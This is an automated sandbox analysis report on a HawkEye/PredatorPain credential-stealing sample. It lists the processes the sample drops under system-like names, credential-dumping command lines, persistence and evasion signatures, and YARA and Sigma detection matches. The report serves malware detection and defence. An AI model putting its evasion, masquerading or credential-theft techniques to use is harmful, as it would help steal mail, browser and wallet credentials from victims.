Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report aaVb1xEmrd

Overview

General Information

Sample Name:aaVb1xEmrd (renamed file extension from none to exe)
Analysis ID:478309
MD5:c428b176eca6b17cda3f5729abaddf0b
SHA1:65262ee5ea9c832436c6eba4a5e58d69900aea72
SHA256:b139dd73d811c0d20602ebd74f962724d2c9e31958bdea9326473bf4bbd746b9
Tags:exeHawkEye
Infos:

Most interesting Screenshot:

Detection

HawkEye MailPassView PredatorPainRAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected MailPassView
Yara detected HawkEye Keylogger
Yara detected PredatorPainRAT
System process connects to network (likely due to code injection or exploit)
Antivirus detection for dropped file
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Antivirus / Scanner detection for submitted sample
Detected HawkEye Rat
Multi AV Scanner detection for dropped file
Sigma detected: System File Execution Location Anomaly
Creates multiple autostart registry keys
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
Allocates memory in foreign processes
May check the online IP address of the machine
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Sigma detected: Suspicious Svchost Process
Tries to steal Mail credentials (via file access)
Drops PE files with benign system names
Sample uses process hollowing technique
Installs a global keyboard hook
Disables Windows system restore
Writes to foreign memory regions
.NET source code references suspicious native API functions
Contains functionality to log keystrokes (.Net Source)
Changes the view of files in windows explorer (hidden files and folders)
Yara detected WebBrowserPassView password recovery tool
Creates an undocumented autostart registry key
Machine Learning detection for dropped file
Tries to steal Instant Messenger accounts or passwords
Antivirus or Machine Learning detection for unpacked file
One or more processes crash
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Checks if the current process is being debugged
Launches processes in debugging mode, may be used to hinder debugging
Creates a process in suspended mode (likely to inject code)
Contains functionality for read data from the clipboard
Sigma detected: PowerShell Script Run in AppData
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to shutdown / reboot the system
Creates files inside the system directory
May infect USB drives
Found potential string decryption / allocating functions
Contains functionality to call native functions
Enables debug privileges
AV process strings found (often used to terminate AV products)
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Detected TCP or UDP traffic on non-standard ports
Contains functionality to detect virtual machines (SLDT)
Uses SMTP (mail sending)
Creates a window with clipboard capturing capabilities
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries disk information (often used to detect virtual machines)
Contains functionality to query network adapater information
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • aaVb1xEmrd.exe (PID: 2432 cmdline: 'C:\Users\user\Desktop\aaVb1xEmrd.exe' MD5: C428B176ECA6B17CDA3F5729ABADDF0B)
    • MULTIBOT_NEWW.exe (PID: 4768 cmdline: 'C:\Users\user\AppData\Local\Temp\MULTIBOT_NEWW.exe' MD5: 3F620FFD8BE649D1D31AB54F73A559BE)
    • svchost.exe (PID: 4280 cmdline: 'C:\Users\user\AppData\Local\Temp\svchost.exe' MD5: A273A781070D239BA99D3FD8EF341E6C)
      • svchost.exe (PID: 6256 cmdline: 'C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exe' MD5: A273A781070D239BA99D3FD8EF341E6C)
    • taskhost.exe (PID: 4548 cmdline: 'C:\Users\user\AppData\Local\Temp\taskhost.exe' MD5: 83827B8CFFE67A789B03E342ED3B1572)
      • dw20.exe (PID: 6148 cmdline: dw20.exe -x -s 2200 MD5: 8D10DA8A3E11747E51F23C882C22BBC3)
      • vbc.exe (PID: 6280 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt' MD5: C63ED21D5706A527419C9FBD730FFB2E)
        • WerFault.exe (PID: 6612 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6280 -s 176 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
      • vbc.exe (PID: 6292 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt' MD5: C63ED21D5706A527419C9FBD730FFB2E)
        • WerFault.exe (PID: 6624 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6292 -s 176 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • iExplorer.exe (PID: 1352 cmdline: 'C:\Users\user\AppData\Local\Temp\iExplorer.exe' MD5: A0DBD1314D214588960B1E0BCED5F4E0)
      • Windows Update.exe (PID: 5204 cmdline: 'C:\Users\user\AppData\Roaming\Windows Update.exe' MD5: A0DBD1314D214588960B1E0BCED5F4E0)
        • dw20.exe (PID: 6724 cmdline: dw20.exe -x -s 2324 MD5: 8D10DA8A3E11747E51F23C882C22BBC3)
        • vbc.exe (PID: 6912 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt' MD5: C63ED21D5706A527419C9FBD730FFB2E)
        • vbc.exe (PID: 6928 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt' MD5: C63ED21D5706A527419C9FBD730FFB2E)
        • WerFault.exe (PID: 5276 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5204 -s 2336 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
        • WerFault.exe (PID: 5200 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5204 -s 2336 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • svchost.exe (PID: 6440 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6740 cmdline: 'C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exe' MD5: A273A781070D239BA99D3FD8EF341E6C)
  • svchost.exe (PID: 6960 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 7088 cmdline: c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 4920 cmdline: c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • WindowsUpdate.exe (PID: 6112 cmdline: 'C:\Users\user\AppData\Roaming\WindowsUpdate.exe' MD5: 83827B8CFFE67A789B03E342ED3B1572)
    • dw20.exe (PID: 4068 cmdline: dw20.exe -x -s 1168 MD5: 8D10DA8A3E11747E51F23C882C22BBC3)
  • svchost.exe (PID: 3396 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6376 cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6468 cmdline: 'C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exe' MD5: A273A781070D239BA99D3FD8EF341E6C)
  • WindowsUpdate.exe (PID: 6656 cmdline: 'C:\Users\user\AppData\Roaming\WindowsUpdate.exe' MD5: 83827B8CFFE67A789B03E342ED3B1572)
    • dw20.exe (PID: 7084 cmdline: dw20.exe -x -s 1096 MD5: 8D10DA8A3E11747E51F23C882C22BBC3)
  • svchost.exe (PID: 1752 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5168 cmdline: 'C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exe' MD5: A273A781070D239BA99D3FD8EF341E6C)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Roaming\Windows Update.exeRAT_PredatorPainDetects PredatorPain RATKevin Breen <kevin@techanarchy.net>
  • 0x7b7df:$string1: holderwb.txt
  • 0x7b7fb:$string1: holderwb.txt
  • 0x7b961:$string3: There is a file attached to this email
  • 0x7bf35:$string4: screens\screenshot
  • 0x7a364:$string5: Disablelogger
  • 0x7a30e:$string6: \pidloc.txt
  • 0x79e1c:$string7: clearie
  • 0x79e34:$string8: clearff
  • 0x7a5c5:$string9: emails should be sent to you shortly
  • 0x7aad9:$string11: open=Sys.exe
  • 0x7a326:$ver1: PredatorLogger
  • 0x7a9a8:$ver3: Predator Pain
  • 0x7b79b:$ver3: Predator Pain
  • 0x7b910:$ver3: Predator Pain
  • 0x7bb27:$ver3: Predator Pain
C:\Users\user\AppData\Roaming\Windows Update.exeHKTL_NET_GUID_StealerDetects c# red/black-team tools via typelibguidArnim Rupp
  • 0x615f:$typelibguid0: 8fcd4931-91a2-4e18-849b-70de34ab75df
C:\Users\user\AppData\Roaming\Windows Update.exeJoeSecurity_PredatorPainRATYara detected PredatorPainRATKevin Breen <kevin@techanarchy.net>
    C:\Users\user\AppData\Roaming\Windows Update.exeJoeSecurity_MailPassViewYara detected MailPassViewJoe Security
      C:\Users\user\AppData\Roaming\Windows Update.exeJoeSecurity_WebBrowserPassViewYara detected WebBrowserPassView password recovery toolJoe Security
        Click to see the 19 entries

        Memory Dumps

        SourceRuleDescriptionAuthorStrings
        00000005.00000000.227084659.00000000009C2000.00000002.00020000.sdmpRAT_HawkEyeDetects HawkEye RATKevin Breen <kevin@techanarchy.net>
        • 0x7b68e:$key: HawkEyeKeylogger
        • 0x7d8e0:$salt: 099u787978786
        • 0x7bcdd:$string1: HawkEye_Keylogger
        • 0x7cb30:$string1: HawkEye_Keylogger
        • 0x7d840:$string1: HawkEye_Keylogger
        • 0x7c0c6:$string2: holdermail.txt
        • 0x7c0e6:$string2: holdermail.txt
        • 0x7c008:$string3: wallet.dat
        • 0x7c020:$string3: wallet.dat
        • 0x7c036:$string3: wallet.dat
        • 0x7d422:$string4: Keylog Records
        • 0x7d73a:$string4: Keylog Records
        • 0x7d938:$string5: do not script -->
        • 0x7b676:$string6: \pidloc.txt
        • 0x7b704:$string7: BSPLIT
        • 0x7b714:$string7: BSPLIT
        00000005.00000000.227084659.00000000009C2000.00000002.00020000.sdmpJoeSecurity_MailPassViewYara detected MailPassViewJoe Security
          00000005.00000000.227084659.00000000009C2000.00000002.00020000.sdmpJoeSecurity_HawkEyeYara detected HawkEye KeyloggerJoe Security
            00000005.00000000.227084659.00000000009C2000.00000002.00020000.sdmpJoeSecurity_WebBrowserPassViewYara detected WebBrowserPassView password recovery toolJoe Security
              00000005.00000000.227084659.00000000009C2000.00000002.00020000.sdmpHawkeyedetect HawkEye in memoryJPCERT/CC Incident Response Group
              • 0x7bd35:$hawkstr1: HawkEye Keylogger
              • 0x7cb76:$hawkstr1: HawkEye Keylogger
              • 0x7cea5:$hawkstr1: HawkEye Keylogger
              • 0x7d000:$hawkstr1: HawkEye Keylogger
              • 0x7d163:$hawkstr1: HawkEye Keylogger
              • 0x7d3fa:$hawkstr1: HawkEye Keylogger
              • 0x7b8c3:$hawkstr2: Dear HawkEye Customers!
              • 0x7cef8:$hawkstr2: Dear HawkEye Customers!
              • 0x7d04f:$hawkstr2: Dear HawkEye Customers!
              • 0x7d1b6:$hawkstr2: Dear HawkEye Customers!
              • 0x7b9e4:$hawkstr3: HawkEye Logger Details:
              Click to see the 65 entries

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              8.0.Windows Update.exe.3d0000.10.unpackRAT_PredatorPainDetects PredatorPain RATKevin Breen <kevin@techanarchy.net>
              • 0x7b7df:$string1: holderwb.txt
              • 0x7b7fb:$string1: holderwb.txt
              • 0x7b961:$string3: There is a file attached to this email
              • 0x7bf35:$string4: screens\screenshot
              • 0x7a364:$string5: Disablelogger
              • 0x7a30e:$string6: \pidloc.txt
              • 0x79e1c:$string7: clearie
              • 0x79e34:$string8: clearff
              • 0x7a5c5:$string9: emails should be sent to you shortly
              • 0x7aad9:$string11: open=Sys.exe
              • 0x7a326:$ver1: PredatorLogger
              • 0x7a9a8:$ver3: Predator Pain
              • 0x7b79b:$ver3: Predator Pain
              • 0x7b910:$ver3: Predator Pain
              • 0x7bb27:$ver3: Predator Pain
              8.0.Windows Update.exe.3d0000.10.unpackHKTL_NET_GUID_StealerDetects c# red/black-team tools via typelibguidArnim Rupp
              • 0x615f:$typelibguid0: 8fcd4931-91a2-4e18-849b-70de34ab75df
              8.0.Windows Update.exe.3d0000.10.unpackJoeSecurity_PredatorPainRATYara detected PredatorPainRATKevin Breen <kevin@techanarchy.net>
                8.0.Windows Update.exe.3d0000.10.unpackJoeSecurity_MailPassViewYara detected MailPassViewJoe Security
                  8.0.Windows Update.exe.3d0000.10.unpackJoeSecurity_WebBrowserPassViewYara detected WebBrowserPassView password recovery toolJoe Security
                    Click to see the 206 entries

                    Sigma Overview

                    System Summary:

                    barindex
                    Sigma detected: System File Execution Location AnomalyShow sources
                    Source: Process startedAuthor: Florian Roth, Patrick Bareiss, Anton Kutepov, oscd.community: Data: Command: 'C:\Users\user\AppData\Local\Temp\svchost.exe' , CommandLine: 'C:\Users\user\AppData\Local\Temp\svchost.exe' , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\svchost.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\svchost.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\svchost.exe, ParentCommandLine: 'C:\Users\user\Desktop\aaVb1xEmrd.exe' , ParentImage: C:\Users\user\Desktop\aaVb1xEmrd.exe, ParentProcessId: 2432, ProcessCommandLine: 'C:\Users\user\AppData\Local\Temp\svchost.exe' , ProcessId: 4280
                    Sigma detected: Suspicious Svchost ProcessShow sources
                    Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\user\AppData\Local\Temp\svchost.exe' , CommandLine: 'C:\Users\user\AppData\Local\Temp\svchost.exe' , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\svchost.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\svchost.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\svchost.exe, ParentCommandLine: 'C:\Users\user\Desktop\aaVb1xEmrd.exe' , ParentImage: C:\Users\user\Desktop\aaVb1xEmrd.exe, ParentProcessId: 2432, ProcessCommandLine: 'C:\Users\user\AppData\Local\Temp\svchost.exe' , ProcessId: 4280
                    Sigma detected: PowerShell Script Run in AppDataShow sources
                    Source: Process startedAuthor: Florian Roth, Jonhnathan Ribeiro, oscd.community: Data: Command: 'C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exe' , CommandLine: 'C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exe' , CommandLine|base64offset|contains: , Image: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exe, NewProcessName: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exe, OriginalFileName: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exe, ParentCommandLine: 'C:\Users\user\AppData\Local\Temp\svchost.exe' , ParentImage: C:\Users\user\AppData\Local\Temp\svchost.exe, ParentProcessId: 4280, ProcessCommandLine: 'C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exe' , ProcessId: 6256
                    Sigma detected: Windows Processes Suspicious Parent DirectoryShow sources
                    Source: Process startedAuthor: vburov: Data: Command: 'C:\Users\user\AppData\Local\Temp\svchost.exe' , CommandLine: 'C:\Users\user\AppData\Local\Temp\svchost.exe' , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\svchost.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\svchost.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\svchost.exe, ParentCommandLine: 'C:\Users\user\Desktop\aaVb1xEmrd.exe' , ParentImage: C:\Users\user\Desktop\aaVb1xEmrd.exe, ParentProcessId: 2432, ProcessCommandLine: 'C:\Users\user\AppData\Local\Temp\svchost.exe' , ProcessId: 4280

                    Jbx Signature Overview

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection:

                    barindex
                    Antivirus detection for dropped fileShow sources
                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeAvira: detection malicious, Label: TR/Spy.Gen
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeAvira: detection malicious, Label: TR/AD.MExecute.lzrac
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeAvira: detection malicious, Label: SPR/Tool.MailPassView.473
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows Firewall\WIN32.exeAvira: detection malicious, Label: TR/Spy.Gen
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeAvira: detection malicious, Label: TR/AD.MExecute.lzrac
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeAvira: detection malicious, Label: SPR/Tool.MailPassView.473
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeAvira: detection malicious, Label: TR/AD.MExecute.lzrac
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeAvira: detection malicious, Label: SPR/Tool.MailPassView.473
                    Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeAvira: detection malicious, Label: TR/AD.MExecute.lzrac
                    Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeAvira: detection malicious, Label: SPR/Tool.MailPassView.473
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeAvira: detection malicious, Label: TR/Spy.Gen
                    Multi AV Scanner detection for submitted fileShow sources
                    Source: aaVb1xEmrd.exeVirustotal: Detection: 69%Perma Link
                    Source: aaVb1xEmrd.exeMetadefender: Detection: 28%Perma Link
                    Source: aaVb1xEmrd.exeReversingLabs: Detection: 74%
                    Antivirus / Scanner detection for submitted sampleShow sources
                    Source: aaVb1xEmrd.exeAvira: detected
                    Multi AV Scanner detection for dropped fileShow sources
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeMetadefender: Detection: 60%Perma Link
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeReversingLabs: Detection: 85%
                    Machine Learning detection for sampleShow sources
                    Source: aaVb1xEmrd.exeJoe Sandbox ML: detected
                    Machine Learning detection for dropped fileShow sources
                    Source: C:\Users\user\AppData\Local\Temp\MULTIBOT_NEWW.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows Firewall\WIN32.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeJoe Sandbox ML: detected
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeJoe Sandbox ML: detected
                    Source: 7.2.iExplorer.exe.6d0000.0.unpackAvira: Label: TR/AD.MExecute.lzrac
                    Source: 7.2.iExplorer.exe.6d0000.0.unpackAvira: Label: SPR/Tool.MailPassView.473
                    Source: 5.0.taskhost.exe.9c0000.0.unpackAvira: Label: TR/AD.MExecute.lzrac
                    Source: 5.0.taskhost.exe.9c0000.0.unpackAvira: Label: SPR/Tool.MailPassView.473
                    Source: 10.0.svchost.exe.bc0000.0.unpackAvira: Label: TR/Spy.Gen
                    Source: 8.0.Windows Update.exe.3d0000.4.unpackAvira: Label: TR/AD.MExecute.lzrac
                    Source: 8.0.Windows Update.exe.3d0000.4.unpackAvira: Label: SPR/Tool.MailPassView.473
                    Source: 8.0.Windows Update.exe.3d0000.10.unpackAvira: Label: TR/AD.MExecute.lzrac
                    Source: 8.0.Windows Update.exe.3d0000.10.unpackAvira: Label: SPR/Tool.MailPassView.473
                    Source: 7.0.iExplorer.exe.6d0000.0.unpackAvira: Label: TR/AD.MExecute.lzrac
                    Source: 7.0.iExplorer.exe.6d0000.0.unpackAvira: Label: SPR/Tool.MailPassView.473
                    Source: 4.0.svchost.exe.f30000.0.unpackAvira: Label: TR/Spy.Gen
                    Source: 19.0.svchost.exe.320000.0.unpackAvira: Label: TR/Spy.Gen
                    Source: 5.2.taskhost.exe.9c0000.0.unpackAvira: Label: TR/AD.MExecute.lzrac
                    Source: 5.2.taskhost.exe.9c0000.0.unpackAvira: Label: SPR/Tool.MailPassView.473
                    Source: 8.0.Windows Update.exe.3d0000.0.unpackAvira: Label: TR/AD.MExecute.lzrac
                    Source: 8.0.Windows Update.exe.3d0000.0.unpackAvira: Label: SPR/Tool.MailPassView.473
                    Source: 8.2.Windows Update.exe.3d0000.0.unpackAvira: Label: TR/AD.MExecute.lzrac
                    Source: 8.2.Windows Update.exe.3d0000.0.unpackAvira: Label: SPR/Tool.MailPassView.473
                    Source: aaVb1xEmrd.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeFile opened: C:\Windows\WinSxS\amd64_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_88df21dd2faf7c49\MSVCR80.dllJump to behavior
                    Source: Binary string: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.pdb source: Windows Update.exe, 00000008.00000000.277693996.0000000000A27000.00000004.00000040.sdmp
                    Source: Binary string: C:\Windows\SYSTEM32\winnlsres.dlls.pdb source: svchost.exe, 0000000A.00000002.490336011.00000000010A9000.00000004.00000001.sdmp
                    Source: Binary string: symbols\dll\mscorlib.pdb source: Windows Update.exe, 00000008.00000000.287657799.0000000008F0A000.00000004.00000001.sdmp
                    Source: Binary string: mscorlib.pdbcorlib.pdbpdblib.pdb2.0.0.0__b77a5c561934e089\mscorlib.pdb source: Windows Update.exe, 00000008.00000000.287657799.0000000008F0A000.00000004.00000001.sdmp
                    Source: Binary string: C:\Windows\dll\mscorlib.pdb source: Windows Update.exe, 00000008.00000000.277693996.0000000000A27000.00000004.00000040.sdmp
                    Source: Binary string: System.Windows.Forms.pdb5c5619 source: svchost.exe, 0000000A.00000002.491098692.0000000001502000.00000004.00000001.sdmp
                    Source: Binary string: f:\Projects\VS2005\WebBrowserPassView\Release\WebBrowserPassView.pdb source: taskhost.exe, iExplorer.exe, Windows Update.exe
                    Source: Binary string: mscorlib.pdbndows Update.exe source: Windows Update.exe, 00000008.00000000.277693996.0000000000A27000.00000004.00000040.sdmp
                    Source: Binary string: C:\Windows\mscorlib.pdbd source: Windows Update.exe, 00000008.00000000.277693996.0000000000A27000.00000004.00000040.sdmp
                    Source: Binary string: rlib.pdb source: Windows Update.exe, 00000008.00000000.277693996.0000000000A27000.00000004.00000040.sdmp
                    Source: Binary string: System.pdb source: svchost.exe, 0000000A.00000002.491122955.0000000001513000.00000004.00000001.sdmp
                    Source: Binary string: mscorlib.pdb source: Windows Update.exe, 00000008.00000000.287657799.0000000008F0A000.00000004.00000001.sdmp
                    Source: Binary string: 1?pC:\Windows\mscorlib.pdb source: Windows Update.exe, 00000008.00000000.287657799.0000000008F0A000.00000004.00000001.sdmp
                    Source: Binary string: C:\Windows\symbols\dll\System.Windows.Forms.pdbl source: svchost.exe, 0000000A.00000002.491098692.0000000001502000.00000004.00000001.sdmp
                    Source: Binary string: C:\Users\Jovan\Documents\Visual Studio 2010\Projects\Stealer\CMemoryExecute\CMemoryExecute\obj\Release\CMemoryExecute.pdb source: taskhost.exe, iExplorer.exe, Windows Update.exe
                    Source: Binary string: C:\Windows\assembly\GA.pdbmscorlib\2.0.0.0__b77a5c561934e089\mscorlib.dll source: Windows Update.exe, 00000008.00000000.287657799.0000000008F0A000.00000004.00000001.sdmp
                    Source: Binary string: indows\mscorlib.pdbpdblib.pdb source: Windows Update.exe, 00000008.00000000.277693996.0000000000A27000.00000004.00000040.sdmp
                    Source: Binary string: f:\Projects\VS2005\mailpv\Release\mailpv.pdb source: taskhost.exe, iExplorer.exe, Windows Update.exe, vbc.exe, 00000014.00000002.274318737.0000000000400000.00000040.00000001.sdmp
                    Source: Binary string: ws\System.Windows.Forms.pdbpdbrms.pdb source: svchost.exe, 0000000A.00000002.491098692.0000000001502000.00000004.00000001.sdmp
                    Source: Binary string: C:\Windows\assembly\GAC_MSIL\System.Windows.Forms\2.0.0.0__b77a5c561934e089\System.Windows.Forms.pdb.p source: svchost.exe, 0000000A.00000002.491098692.0000000001502000.00000004.00000001.sdmp
                    Source: Binary string: C:\Windows\System.Windows.Forms.pdbsys source: svchost.exe, 0000000A.00000002.491098692.0000000001502000.00000004.00000001.sdmp
                    Source: Binary string: C:\Windows\symbols\dll\mscorlib.pdb source: Windows Update.exe, 00000008.00000000.277693996.0000000000A27000.00000004.00000040.sdmp
                    Source: Binary string: mscorlib.pdbH source: Windows Update.exe, 00000008.00000000.287657799.0000000008F0A000.00000004.00000001.sdmp
                    Source: Binary string: kC:\Windows\dll\System.Windows.Forms.pdb source: svchost.exe, 0000000A.00000002.491098692.0000000001502000.00000004.00000001.sdmp
                    Source: Binary string: C:\Windows\System.pdb source: svchost.exe, 0000000A.00000002.491122955.0000000001513000.00000004.00000001.sdmp
                    Source: taskhost.exeBinary or memory string: [autorun]
                    Source: taskhost.exeBinary or memory string: autorun.inf
                    Source: iExplorer.exeBinary or memory string: [autorun]
                    Source: iExplorer.exeBinary or memory string: autorun.inf
                    Source: Windows Update.exeBinary or memory string: [autorun]
                    Source: Windows Update.exeBinary or memory string: autorun.inf
                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeFile opened: C:\Vaccine\4535425425342grt45454s5s4\tg43gey4wk5l4jw56k34j5l4kjlsw56jkwl6j\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeFile opened: C:\Vaccine\4535425425342grt45454s5s4\tg43gey4wk5l4jw56k34j5l4kjlsw56jkwl6j\gtrewt543w5j4hktjh4lk5qlktresty3\gtry6wy5u54w64get63r3\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeFile opened: C:\Vaccine\4535425425342grt45454s5s4\tg43gey4wk5l4jw56k34j5l4kjlsw56jkwl6j\gtrewt543w5j4hktjh4lk5qlktresty3\gtry6wy5u54w64get63r3\ty34t43t4t4te45634\CureMe\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeFile opened: C:\Vaccine\4535425425342grt45454s5s4\tg43gey4wk5l4jw56k34j5l4kjlsw56jkwl6j\gtrewt543w5j4hktjh4lk5qlktresty3\gtry6wy5u54w64get63r3\ty34t43t4t4te45634\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeFile opened: C:\Vaccine\4535425425342grt45454s5s4\tg43gey4wk5l4jw56k34j5l4kjlsw56jkwl6j\gtrewt543w5j4hktjh4lk5qlktresty3\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeFile opened: C:\Vaccine\4535425425342grt45454s5s4\Jump to behavior
                    Source: C:\Users\user\Desktop\aaVb1xEmrd.exeCode function: 1_2_00405C6C SetErrorMode,SetErrorMode,FindFirstFileA,SetErrorMode,FindClose,1_2_00405C6C
                    Source: C:\Users\user\Desktop\aaVb1xEmrd.exeCode function: 1_2_004052DC DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,1_2_004052DC
                    Source: C:\Users\user\Desktop\aaVb1xEmrd.exeCode function: 1_2_004026B9 FindFirstFileA,1_2_004026B9
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeCode function: 4x nop then lea esp, dword ptr [ebp-08h]5_2_052077F0
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeCode function: 4x nop then lea esp, dword ptr [ebp-0Ch]5_2_05200728
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeCode function: 4x nop then lea esp, dword ptr [ebp-0Ch]5_2_0520A32E
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeCode function: 4x nop then lea esp, dword ptr [ebp-0Ch]5_2_05206711
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeCode function: 4x nop then lea esp, dword ptr [ebp-0Ch]5_2_05205B73
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeCode function: 4x nop then call 05201B20h5_2_05208D5F
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeCode function: 4x nop then lea esp, dword ptr [ebp-0Ch]5_2_05208D5F
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeCode function: 4x nop then lea esp, dword ptr [ebp-0Ch]5_2_05209BA1
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeCode function: 4x nop then jmp 05201A73h5_2_052019A3
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeCode function: 4x nop then jmp 05201A73h5_2_052019B0
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeCode function: 4x nop then call 05201B20h5_2_05209596
